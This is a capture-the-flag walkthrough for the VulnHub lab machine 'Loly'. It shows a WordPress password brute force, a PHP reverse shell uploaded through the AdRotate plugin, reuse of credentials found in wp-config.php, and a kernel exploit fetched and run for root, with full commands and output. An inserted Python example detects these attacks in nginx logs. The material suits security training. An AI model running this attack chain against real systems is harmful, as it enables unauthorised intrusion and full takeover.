[VULNHUB] Loly

Today we are going to hack the VulnHub machine called Loly. You can download it from the following link: Loly

Enumeration


We start with an nmap scan to see which ports are open.

sml@aLiCe:~$ nmap -A -p- 192.168.146.132
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 22:03 CEST
Nmap scan report for 192.168.146.132
Host is up (0.00072s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.05 seconds
We see that only port 80 is open, so we explore it a bit further.

sml@aLiCe:~$ gobuster dir -u http://192.168.146.132 -w /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.146.132
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/12 22:05:56 Starting gobuster
===============================================================
/wordpress (Status: 301)
===============================================================
2020/09/12 22:05:58 Finished
===============================================================
We see it has a "wordpress" directory. We enumerate the users with:

wpscan --url http://192.168.146.132/wordpress --enumerate -u
The user "loly" shows up. We brute-force the user loly to see if we can get the password and log in to WordPress.

sml@aLiCe:~$ wpscan --url http://192.168.146.132/wordpress --usernames loly --passwords /usr/share/wordlists/rockyou.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.2
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.146.132/wordpress/ [192.168.146.132]
[+] Started: Sat Sep 12 22:10:43 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.146.132/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.146.132/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%


[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 
<======================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando                                                     
                                   
Trying loly / corazon Time: 00:00:01 
<=========================================> (175 / 175) 100.00% Time: 00:00:01

[!] Valid Combinations Found:
 | Username: loly, Password: fernando

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Sat Sep 12 22:11:00 2020
[+] Requests Done: 200
[+] Cached Requests: 25
[+] Data Sent: 96.89 KB
[+] Data Received: 109.146 KB
[+] Memory used: 951.316 MB
[+] Elapsed time: 00:00:17
We find the password: fernando. When we go to http://192.168.146.132/wordpress/wp-admin we are redirected to loly.lc, so we add loly.lc to our /etc/hosts file. Once that is done, we log in to WordPress with the credentials. We see the AdRotate plugin is installed. We go to Adrotate -> Manage Media. On our machine we prepare a PHP reverse shell and then compress it as a .zip file:

sml@aLiCe:~$ cp /usr/share/webshell/php/php-reverse-shell.php .
sml@aLiCe:~$ mv php-reverse-shell.php rshell.php
sml@aLiCe:~$ nano rshell.php
sml@aLiCe:~$ zip rshell.zip rshell.php 
  adding: rshell.php (deflated 59%)
sml@aLiCe:~$ 
We upload the .zip file through Adrotate Manage Media. We set nc listening:

sml@aLiCe:~$ nc -nlvp 1234
listening on [any] 1234 ...
We browse to: http://loly.lc/wordpress/wp-content/banners/rshell.php
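Both steps above leave a clear trace in the nginx access log: the WPScan password attack is a burst of POSTs to xmlrpc.php from one address, and the webshell is a PHP file being served from wp-content/banners/, a directory that should only ever hold media. The following Python is an added example (not part of the original writeup) that runs those two detections over constructed log lines modelled on this session; the combined log format, the 192.168.146.131 source address and the timestamps are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed nginx access log (combined format) modelled on this writeup:
# 25 XML-RPC POSTs in 25 seconds, one normal visitor, then a request for
# the PHP file dropped under wp-content/banners/ via the AdRotate upload.
_FMT = '192.168.146.131 - - [12/Sep/2020:22:10:{:02d} +0200] "{} HTTP/1.1" 200 512 "-" "WPScan v3.8.2"'
SAMPLE_LOG = "\n".join(
    [_FMT.format(s, "POST /wordpress/xmlrpc.php") for s in range(25)]
    + ['10.0.0.5 - - [12/Sep/2020:22:12:01 +0200] "GET /wordpress/ HTTP/1.1" 200 7841 "-" "Mozilla/5.0"',
       '192.168.146.131 - - [12/Sep/2020:22:40:09 +0200] "GET /wordpress/wp-content/banners/rshell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"']
)

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# PHP must never be executed out of writable media directories.
MEDIA_PHP_RE = re.compile(r"/wp-content/(?:uploads|banners)/.*\.php(?:$|\?)", re.I)

def parse_line(line):
    """Parse one combined-format access log line; None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    return e

def xmlrpc_bursts(log_text, threshold=20, window=timedelta(minutes=1)):
    """{ip: peak count} for IPs with >= threshold POSTs to xmlrpc.php inside one window."""
    posts = defaultdict(list)
    for line in log_text.splitlines():
        e = parse_line(line)
        if e and e["method"] == "POST" and e["path"].endswith("/xmlrpc.php"):
            posts[e["ip"]].append(e["ts"])
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), end - start + 1)
    return flagged

def php_under_media_dirs(log_text):
    """(ip, path, status) for PHP scripts requested under WordPress media directories."""
    hits = []
    for line in log_text.splitlines():
        e = parse_line(line)
        if e and MEDIA_PHP_RE.search(e["path"]):
            hits.append((e["ip"], e["path"], e["status"]))
    return hits
```

The same two checks translate directly into an nginx `location` rule that refuses to pass `.php` under those directories to php-fpm, and into a rate limit or outright block on `xmlrpc.php` when nothing legitimately uses it.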

Low Shell



sml@aLiCe:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.146.131] from (UNKNOWN) [192.168.146.132] 59286
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 13:47:01 up 44 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
We explore the system and read the wp-config.php file in the WordPress directory to see if we can get any credentials.

www-data@ubuntu:/$ cat /var/www/html/wordpress/wp-config.php
---SNIP---
/** MySQL database username */
define( 'DB_USER', 'wordpress' );

/** MySQL database password */
define( 'DB_PASSWORD', 'lolyisabeautifulgirl' );
---SNIP---
We find a password :) There is a user called loly on the system, so we try to log in as loly with the password we just found.

su loly
Password: lolyisabeautifulgirl
loly@ubuntu:~$ 
We are loly now! We keep exploring the system.

loly@ubuntu:~$ cat /etc/issue
Ubuntu 16.04.1 LTS \n \l
loly@ubuntu:~$ uname -a
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

Privilege Escalation


We see it is Ubuntu 16.04 with kernel 4.4.0-31. We look for an exploit and find one [1]. We download it to our machine and transfer it to the victim.

loly@ubuntu:~$ wget http://192.168.146.131/45010.c
wget http://192.168.146.131/45010.c
--2020-09-12 15:05:47--  http://192.168.146.131/45010.c
Connecting to 192.168.146.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13728 (13K) [application/octet-stream]
Saving to: ‘45010.c’

45010.c             100%[===================>]  13.41K  --.-KB/s    in 0s      

2020-09-12 15:05:47 (443 MB/s) - ‘45010.c’ saved [13728/13728]
We compile it.

loly@ubuntu:~$ gcc -o 4 45010.c
And run it!

loly@ubuntu:~$ ./4
./4
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88007973af00
[*] Leaking sock struct from ffff880075daddc0
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880072e50840
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880072e50840
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(loly)

root.txt



# cd /root
# ls
root.txt
# cat root.txt
  ____               ____ ____  ____  
 / ___| _   _ _ __  / ___/ ___||  _ \ 
 \___ \| | | | '_ \| |   \___ \| |_) |
  ___) | |_| | | | | |___ ___) |  _ < 
 |____/ \__,_|_| |_|\____|____/|_| \_\
                                      
Congratulations. I'm BigCityBoy

End


And with that we are root on the machine.

[1] https://www.exploit-db.com/exploits/45010